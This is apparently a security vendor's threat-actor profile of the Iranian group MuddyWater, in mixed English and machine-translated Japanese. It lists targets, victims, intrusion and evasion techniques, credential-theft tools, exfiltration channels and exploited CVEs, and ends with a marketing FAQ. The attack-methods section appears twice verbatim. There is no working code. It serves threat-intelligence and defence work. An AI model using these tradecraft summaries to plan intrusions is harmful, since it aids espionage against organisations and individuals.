MuddyWater
MuddyWater is an Iranian state-sponsored cyber espionage group linked to the Ministry of Intelligence and Security (MOIS) that conducts global intelligence collection through spear-phishing, vulnerability exploitation, and increasingly sophisticated custom command-and-control infrastructure.
MuddyWaterの起源
MuddyWater, also tracked as STATIC KITTEN, Earth Vetala, Seedworm, TA450, MERCURY, and Mango Sandstorm, is a cyber espionage group assessed to operate under Iran’s Ministry of Intelligence and Security (MOIS). Active since at least 2017, the group conducts intelligence collection operations against government, academic, defense, telecommunications, and energy organizations worldwide.
Recent research in 2026 revealed operational infrastructure belonging to MuddyWater hosted on a Netherlands-based VPS, which exposed extensive operational artifacts including command-and-control (C2) frameworks, scripts, victim data, and operational logs. Analysis of this infrastructure confirmed that MuddyWater operates multiple internally developed C2 frameworks and leverages a wide ecosystem of open-source tools to support reconnaissance, exploitation, and data exfiltration operations.
The group demonstrates a hybrid operational approach: combining custom-developed malware frameworks, public exploit code, and legitimate administrative tools to maintain access and evade detection. Recent campaigns also demonstrate experimentation with blockchain-based command-and-control mechanisms, highlighting MuddyWater’s evolving technical capabilities.
対象国
MuddyWater campaigns span multiple regions including the Middle East, Europe, North America, and Central Asia. Recent activity has targeted organizations in Israel, Jordan, Egypt, the United Arab Emirates, Portugal, and the United States, alongside historical operations against entities in Turkey, Iraq, Pakistan, Saudi Arabia, Germany, India, Afghanistan, and Armenia.
対象業界
MuddyWater targets organizations across numerous sectors including government, telecommunications, defense, academic institutions, aviation, healthcare, energy, financial services, NGOs, and technology companies. The group also targets critical infrastructure and organizations involved in immigration, intelligence, and identity systems, indicating a strong focus on intelligence collection.
既知の犠牲者
Recent operations identified targets including:
- Israeli healthcare organizations, hosting providers, and immigration-related services
- Jordanian government webmail infrastructure
- UAE engineering and energy companies
- Egyptian aviation organizations, including EgyptAir
- NGOs connected to Israeli and Jewish communities
- A Portuguese government-related immigration system
The targeting aligns closely with Iranian intelligence priorities, including geopolitical, diplomatic, and regional strategic interests.
MuddyWaterの攻撃方法
MuddyWater gains access through spear-phishing emails, exploitation of public-facing applications, password spraying, and vulnerability exploitation. Recent campaigns leveraged vulnerabilities in Fortinet, Ivanti, Citrix, BeyondTrust, and SolarWinds N-Central, as well as SQL injection vulnerabilities in web applications.
The group frequently escalates privileges through techniques such as UAC bypass, exploitation of edge device vulnerabilities, and administrative account creation, including the creation of persistent FortiGate administrator accounts during exploitation.
Defense evasion includes code obfuscation, encrypted payloads, steganography, and masquerading as legitimate services. MuddyWater also hides C2 infrastructure behind compromised websites, proxy networks, and decentralized infrastructure such as blockchain-based C2 resolution.
Credential theft is performed using tools such as Mimikatz, LaZagne, Browser64, and password spraying attacks targeting Outlook Web Access and SMTP services.
Malware deployed by MuddyWater gathers system information, domain membership, running processes, security software presence, and network configuration to map the victim environment.
The group commonly leverages remote monitoring and management (RMM) tools such as ScreenConnect, Atera Agent, SimpleHelp, and Remote Utilities to move laterally across compromised environments.
Sensitive information is collected from compromised systems including documents, credential databases, screenshots, and locally stored files. In recent campaigns, data included passport scans, visa records, financial documents, and biometric system configurations.
Payload execution is typically performed using PowerShell, Windows Command Shell, JavaScript, Python, and Visual Basic scripts, often executed via legitimate system utilities such as mshta, rundll32, or CMSTP.
Data exfiltration occurs through several mechanisms including:
- Custom C2 channels
- Cloud storage platforms such as Wasabi S3 and put.io
- Amazon EC2 servers
- Lightweight HTTP file servers
- Command-and-control channels using HTTP, DNS, and WebSockets
MuddyWater operations are primarily focused on covert intelligence gathering, with stolen data including government communications, personal identity documents, organizational records, and internal communications.
MuddyWater gains access through spear-phishing emails, exploitation of public-facing applications, password spraying, and vulnerability exploitation. Recent campaigns leveraged vulnerabilities in Fortinet, Ivanti, Citrix, BeyondTrust, and SolarWinds N-Central, as well as SQL injection vulnerabilities in web applications.
The group frequently escalates privileges through techniques such as UAC bypass, exploitation of edge device vulnerabilities, and administrative account creation, including the creation of persistent FortiGate administrator accounts during exploitation.
Defense evasion includes code obfuscation, encrypted payloads, steganography, and masquerading as legitimate services. MuddyWater also hides C2 infrastructure behind compromised websites, proxy networks, and decentralized infrastructure such as blockchain-based C2 resolution.
Credential theft is performed using tools such as Mimikatz, LaZagne, Browser64, and password spraying attacks targeting Outlook Web Access and SMTP services.
Malware deployed by MuddyWater gathers system information, domain membership, running processes, security software presence, and network configuration to map the victim environment.
The group commonly leverages remote monitoring and management (RMM) tools such as ScreenConnect, Atera Agent, SimpleHelp, and Remote Utilities to move laterally across compromised environments.
Sensitive information is collected from compromised systems including documents, credential databases, screenshots, and locally stored files. In recent campaigns, data included passport scans, visa records, financial documents, and biometric system configurations.
Payload execution is typically performed using PowerShell, Windows Command Shell, JavaScript, Python, and Visual Basic scripts, often executed via legitimate system utilities such as mshta, rundll32, or CMSTP.
Data exfiltration occurs through several mechanisms including:
- Custom C2 channels
- Cloud storage platforms such as Wasabi S3 and put.io
- Amazon EC2 servers
- Lightweight HTTP file servers
- Command-and-control channels using HTTP, DNS, and WebSockets
MuddyWater operations are primarily focused on covert intelligence gathering, with stolen data including government communications, personal identity documents, organizational records, and internal communications.
MuddyWaterが使用するTTP
Vectra AIで検知する方法
Vectra AI プラットフォームで利用可能なAPT攻撃を示す検出のリスト。
よくある質問 (FAQ)
MuddyWaterの背後には誰がいるのか?
MuddyWaterはイラン情報安全保障省(MOIS)に帰属する。
MuddyWaterの主な攻撃ベクトルは何か?
槍を使うフィッシング 悪意のある添付ファイルやリンクを含む電子メールや、公衆の目に触れる脆弱性を悪用する。
MuddyWaterはどのように防御を回避するのか?
彼らは様々な難読化手法、正規ツール、ステガノグラフィ、DLLのサイドローディングを採用している。
どの マルウェア ツールがMuddyWaterに関連付けられていますか?
POWERSTATS、NTSTATS、CloudSTATS、PowGoop、Blackwater、ForeLord、MoriAgentなど。
MuddyWaterがターゲットにしている業界は?
電気通信、防衛、学術、石油・ガス、ヘルスケア、テクノロジー、NGO、政府機関など。
MuddyWaterの活動を検知 できるツールは?
組織は、Vectra AIのような先進的なネットワーク検知とレスポンス(NDR)ソリューションを活用すべきである。
MuddyWaterの攻撃を防御するために、組織は何ができるのか?
組織はセキュリティパッチを迅速に適用し、ユーザーをスピア - フィッシング詐欺について教育すべきである。フィッシング アウェアネスについてユーザーを教育し、多要素認証を実施し、ネットワーク・トラフィックとユーザー・アクティビティを注意深く監視する必要がある。
MuddyWaterは脆弱性を利用しているのか?
そう、CVE-2020-0688(Microsoft Exchange)、CVE-2017-0199(Office)、CVE-2020-1472(Netlogon)といった脆弱性を悪用するのだ。
MuddyWaterはグローバルに展開しているのですか?
中東とアジアが主な活動地域だが、MuddyWaterは北米とヨーロッパを含む世界中の事業体をターゲットにしている。
MuddyWaterのラテラルムーブを、組織はどのように検知 できるのか?
組織は、Vectra AIなどの高度なネットワーク検知とレスポンス (NDR) ソリューションを活用することで、MuddyWaterに関連するラテラルムーブを効果的に検知 ことができます。Vectra AIは、人工知能と機械学習アルゴリズムを活用してネットワーク・トラフィックを継続的に監視し、不正なリモート・アクセス・ツールの使用、疑わしい内部接続、予期せぬクレデンシャルの使用パターンなどの異常な行動を迅速に特定します。リアルタイムの可視化と優先順位付けされた脅威アラートを提供することで、Vectra AIはセキュリティチームに、重大な被害が発生する前にMuddyWaterによる脅威を迅速に特定し、封じ込める力を与えます。